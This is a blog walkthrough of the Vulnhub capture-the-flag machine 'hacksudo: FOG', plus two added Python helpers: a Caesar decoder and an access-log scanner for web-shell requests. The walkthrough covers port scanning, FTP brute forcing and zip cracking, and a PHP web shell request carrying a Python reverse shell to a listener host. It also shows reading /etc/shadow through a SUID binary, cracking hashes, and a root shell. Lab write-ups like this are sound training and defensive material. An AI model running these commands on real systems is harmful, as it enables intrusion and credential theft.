Windy's little blog

All the odds and ends of daily life, and I like CTF.

Vulnhub hacksudo: FOG Walkthrough


https://www.vulnhub.com/entry/hacksudo-fog,697/

Scan open ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 
 PORT      STATE SERVICE   VERSION
 21/tcp    open  ftp       Pure-FTPd
 22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 111/tcp   open  rpcbind   2-4 (RPC #100000)
 443/tcp   open  ssl/https Apache/2.4.38 (Debian)
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 2049/tcp  open  nfs_acl   3 (RPC #100227)
 3306/tcp  open  mysql     MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
 ...
 43195/tcp open  mountd    1-3 (RPC #100005)
 45469/tcp open  nlockmgr  1-4 (RPC #100021)
 48871/tcp open  mountd    1-3 (RPC #100005)
 52195/tcp open  mountd    1-3 (RPC #100005)

Enumerate directories and files on port 80; download dict.txt.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 302) [Size: 0] [--> /fog/index.php]
 /index.html           (Status: 200) [Size: 853]
 /index1.html          (Status: 200) [Size: 329]
 /cms                  (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
 /dict.txt             (Status: 200) [Size: 1798]
 /fog                  (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]
 

Found the username hacksudo on the cms page.


Brute-force FTP with dict.txt.

 hydra -l hacksudo -P dict.txt  -t 32 192.168.56.100 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: hacksudo   password: hackme
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found

Download secr3tSteg.zip.

 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 43827
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 33         33                389 May  7 03:34 flag1.txt
 drwxr-xr-x    2 0          0                4096 May  6 13:57 hacksudo_ISRO_bak
 226-Options: -a -l
 226 4 matches total
 ftp> cd hacksudo_ISRO_bak
 250 OK. Current directory is /hacksudo_ISRO_bak
 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 46515
 drwxr-xr-x    2 0          0                4096 May  6 13:57 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 0          0                  63 May  5 11:07 authors.txt
 -rw-r--r--    1 0          0                   0 May  6 11:36 installfog
 -rw-r--r--    1 0          0             1573833 May  6 19:24 secr3tSteg.zip

Brute-force the zip password.

 fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip    
 PASSWORD FOUND!!!!: pw == fooled

Download the SoundStegno tool referenced in the source code of index1.html.


Extract the hidden message from the wav file unzipped from secr3tSteg.zip to get hints.

 python3 /opt/SoundStegno/ExWave.py  -f ./hacksudoSTEGNO.wav  
 ...
 Visit for more tutorials : www.youtube.com/techchipnet
 Hide your text message in wave audio file like MR.ROBOT
 Please wait...
 Your Secret Message is: Shift by 3
 ABCDEFGHIJKLMNOPQRSTUVWXYZ
 DEFGHIJKLMNOPQRSTUVWXYZABC
 zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
 

Decrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.
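As an added example (not from the original post), a small decoder that undoes the shift-by-3 the steg tool revealed and pulls out the credential pair; the ciphertext is the one printed above, and `all_shifts` generalises to a hint that does not state the shift:

```python
# Added example (not from the original post): decode the Caesar-shifted hint
# printed by ExWave.py. The tool said "Shift by 3" with the table
# ABC... -> DEF..., i.e. each plaintext letter was moved forward 3 places,
# so decoding moves it back by 3.
import re
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase

# Ciphertext exactly as shown in the walkthrough output above.
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"


def caesar_decode(text: str, shift: int) -> str:
    """Undo a forward Caesar shift; case is kept and non-letters pass through."""
    out = []
    for ch in text:
        if ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) - shift) % 26])
        elif ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) - shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def all_shifts(text: str) -> dict:
    """All 26 candidate decodings, for a hint that does not state the shift."""
    return {s: caesar_decode(text, s) for s in range(26)}


def extract_credentials(plaintext: str):
    """Pull the Username=...:password=... pair out of the decoded hint."""
    m = re.search(r"Username=([^:\s]+):password=(\S+)", plaintext)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    decoded = caesar_decode(CIPHERTEXT, 3)
    print(decoded)
    print(extract_credentials(decoded))
```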


Log in to the cms with hacksudo:hacksudoISRO. Found cmsmsrce.txt.


Check the content of the txt file.


Copy cmsmsrce.txt to shell.php and visit the following address in the browser.

http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

At the same time, listen on port 1234 in another terminal to catch the reverse shell.
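From the defender's side, an added example (not part of the original post) that scans Apache access log lines for this kind of web-shell request: a command-style parameter whose decoded value is an interpreter or shell command line, served from an uploads directory. The log lines are constructed for illustration; the request path is the one above.

```python
# Added example (not from the original post): flag web-shell style requests
# such as the shell.php?cmd=... call above in an Apache combined access log.
# The log lines are constructed; the request path is the one from the walkthrough.
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_ACCESS_LOG = """\
192.168.56.150 - - [18/May/2021:22:40:01 +0000] "GET /fog/index.php HTTP/1.1" 200 853 "-" "Mozilla/5.0"
192.168.56.150 - - [18/May/2021:22:41:10 +0000] "GET /cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.150 - - [18/May/2021:22:42:00 +0000] "GET /cms/uploads/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names typical of one-line PHP web shells, and substrings that only
# show up when the decoded value is an interpreter or shell command line.
SUSPECT_PARAMS = {"cmd", "exec", "command", "c"}
SUSPECT_TOKENS = ("subprocess", "socket.socket", "os.dup2", "/bin/bash", "/bin/sh", "bash -i")


def analyse_request(path: str):
    """Return (served_from_uploads, [(param, decoded_value), ...])."""
    parts = urlsplit(path)
    findings = []
    # parse_qs percent-decodes values, so the tokens are matched on plaintext
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in SUSPECT_PARAMS:
            continue
        for value in values:
            if any(tok in value for tok in SUSPECT_TOKENS):
                findings.append((name, value))
    from_uploads = "/uploads/" in parts.path and parts.path.endswith(".php")
    return from_uploads, findings


def scan_access_log(text: str):
    """Return one record per request whose parameters look like command execution."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        from_uploads, findings = analyse_request(m["path"])
        if findings:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": urlsplit(m["path"]).path,
                         "from_uploads": from_uploads, "params": findings})
    return hits
```

Run `scan_access_log` over a real access log and route the records to your alerting; a hit with `from_uploads` set is worth an immediate look at the upload directory.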


Find SUID files.

 find / -perm -u=s 2>/dev/null
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/sbin/mount.nfs
 /usr/bin/gpasswd
 /usr/bin/umount
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/look
 /usr/bin/mount
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/su
 /usr/bin/passwd
 

Use look to read /etc/shadow.

 www-data@hacksudo:/home$ look '' /etc/shadow
 look '' /etc/shadow
 root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
 ...
 isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
 dnsmasq:*:18756:0:99999:7:::
 

Crack the password of isro.

 john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 Using default input encoding: UTF-8
 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 qwerty           (isro)

Log in via SSH as user isro. Check sudo, but it's a rabbit hole.

 ssh isro@192.168.56.100
 isro@192.168.56.100's password:
 Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
 isro@hacksudo:~$ sudo -l
 [sudo] password for isro:
 Matching Defaults entries for isro on hacksudo:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User isro may run the following commands on hacksudo:
     (root) /usr/bin/ls /home/isro/*
 isro@hacksudo:~$
 

In /home/isro/fog, found an executable file owned by root.

 isro@hacksudo:~$ ls -la
 total 40
 drwxr-x--- 5 isro isro 4096 May 18 12:16 .
 drwxr-xr-x 6 root root 4096 May  8 12:25 ..
 -rw------- 1 root isro   41 May 18 11:44 .bash_history
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .bash_logout
 -rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
 drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
 drwx------ 3 isro isro 4096 May  5 14:09 .gnupg
 drwxr-xr-x 3 isro isro 4096 May  5 14:11 .local
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .profile
 -r-------- 1 isro isro   33 May  6 14:31 user.txt
 -rw------- 1 isro isro   54 May 18 12:16 .Xauthority
 isro@hacksudo:~$ cd fog
 isro@hacksudo:~/fog$ ls -la
 total 3700
 drwxr-xr-x 2 isro isro    4096 May 13 05:06 .
 drwxr-x--- 5 isro isro    4096 May 18 12:16 ..
 -rwxr-xr-x 1 root isro   16712 May 12 13:46 fog
 -rw-r--r-- 1 isro isro       0 May  6 14:30 get
 -rwxr-xr-x 1 isro isro   69368 May  6 14:29 ping
 -rwxr-xr-x 1 isro isro 3689352 May  6 14:30 python
 

Run fog to get a Python shell; check id, it's root.

 isro@hacksudo:~/fog$ ./fog
 Python 2.7.16 (default, Oct 10 2019, 22:02:15)
 [GCC 8.3.0] on linux2
 Type "help", "copyright", "credits" or "license" for more information.
 >>> import os;os.system("id");
 uid=0(root) gid=1003(isro) groups=1003(isro)
 0

Spawn a root shell.

 >>> import pty;pty.spawn("/bin/bash");
 ┌──(root💀hacksudo)-[~/fog]
 └─# id;hostname
 uid=0(root) gid=1003(isro) groups=1003(isro)
 hacksudo
